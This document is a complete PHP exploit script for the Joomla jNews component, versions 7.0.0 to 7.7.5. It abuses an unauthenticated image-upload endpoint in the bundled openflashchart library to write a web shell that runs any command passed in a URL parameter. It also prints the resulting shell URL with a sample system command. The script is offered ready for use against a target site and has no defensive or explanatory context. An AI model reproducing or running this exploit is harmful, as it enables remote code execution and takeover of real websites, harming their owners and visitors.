jNews com_jnews 7.0.0 => 7.7.5 execute arbitrary PHP code
<?php # jNews 7.0.0 - 7.7.5 ~ Exploit [46] # http://hackforums.net/member.php?action=profile&uid=42381 echo <<<EOT ----------------------------------- / jNews 7.0.0 - 7.7.5 ~ Exploit \ \ Author: Phizo / ----------------------------------- EOT; $options = getopt('u:f:'); if(!isset($options['u'], $options['f'])) die("\n Usage example: php jnews.php -u http://target.com/ -f shell.php\n -u http://target.com/ The full path to Joomla! -f shell.php The name of the file to create.\n"); $url = $options['u']; $file = $options['f']; $shell = "{$url}components/com_jnews/includes/openflashchart/tmp-upload-images/{$file}"; $url = "{$url}components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name={$file}"; $data = "<?php eval(\$_GET['cmd']); ?>"; $headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1', 'Content-Type: text/plain'); echo " [+] Submitting request to: {$options['u']}\n"; $handle = curl_init(); curl_setopt($handle, CURLOPT_URL, $url); curl_setopt($handle, CURLOPT_HTTPHEADER, $headers); curl_setopt($handle, CURLOPT_POSTFIELDS, $data); curl_setopt($handle, CURLOPT_RETURNTRANSFER, true); $source = curl_exec($handle); curl_close($handle); if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r')) { echo " [+] Exploit completed successfully!\n"; echo " ______________________________________________\n\n {$shell}?cmd=system('id');\n"; } else { die(" [+] Exploit was unsuccessful.\n"); } ?>